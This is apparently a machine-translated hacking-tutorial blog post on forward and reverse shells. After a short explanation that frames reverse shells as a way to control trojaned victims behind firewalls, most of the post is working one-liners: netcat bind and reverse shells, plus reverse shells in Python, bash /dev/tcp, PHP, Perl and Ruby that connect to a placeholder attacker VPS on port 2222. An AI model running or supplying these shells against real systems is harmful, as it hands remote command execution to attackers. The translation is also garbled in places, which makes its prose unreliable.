[try to hack] forward shell and reverse shell

Blog home page ： Happy star The blog home page of
Series column ：Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 6 month 26 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

The content of the article comes from the Internet , Only for your own study . More on This article

positive shell And reverse shell

positive shell： The control end actively initiates the connection to connect the controlled end
reverse shell： The controlled end is actively connected to the control end （ Mostly connected vps, Because the attacker's computer usually has no public network IP So you can't connect ）

Mostly reverse shell. In a penetrating environment , Usually, the controlled end is restricted by the firewall 、 Insufficient authority 、 The port is occupied . This will cause the data packets that usually enter the controlled end to be intercepted and other reasons to fail to connect . However, the packets sent by the control end will not be intercepted .

reverse shell It's just that the control side monitors at a certain point TCP/UDP port , The controlled end initiates a request to the port , And transfer the input and output of its command line to the control side

When to reverse shell？
1. A client has your webhorse , But it's in the LAN , You can't connect directly .
2. its ip It will change dynamically , You can't keep controlling .
3. Due to restrictions such as firewall , The other machine can only send requests , Cannot receive request .
4. For viruses , Trojan horse , When will the victim get caught , What is the other party's network environment , When to switch on and off , It's all unknown , So build a server , Let malicious programs actively connect , That's the best way .

positive shell

Open... On the target host 4444 port

nc -lvp 4444 -e /bin/bash                  // linux
nc -lvp 4444 -e c:\windows\system32\cmd.exe      // windows

Locally or VPS On the host, connect to the target host 4444 port

nc  The target host ip 4444

reverse shell

Locally or VPS Listen on the host 9999 port

nc -lvp 9999

Enter the following command on the target host , Connect VPS Or host's 9999 port

nc vps Or host's ip 9999 -e /bin/sh							//linux
nc vps Or host's ip -e c:\windows\system32\cmd.exe			//windows

There is no nc Get the reverse shell

VPS Or listen on the local host 2222 port

nc -lvp 2222

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("vps Or the local host ip",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

bash

bash -i >& /dev/tcp/vps Or the local host ip/2222 0>&1

php

php -r '$sock=fsockopen("vps Or the local host ip",2222);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

perl

perl -e 'use Socket;$i="vps Or the local host ip";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby

ruby -rsocket -e 'c=TCPSocket.new("vps Or the local host ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 or 
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("vps Or the local host ip","2222");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'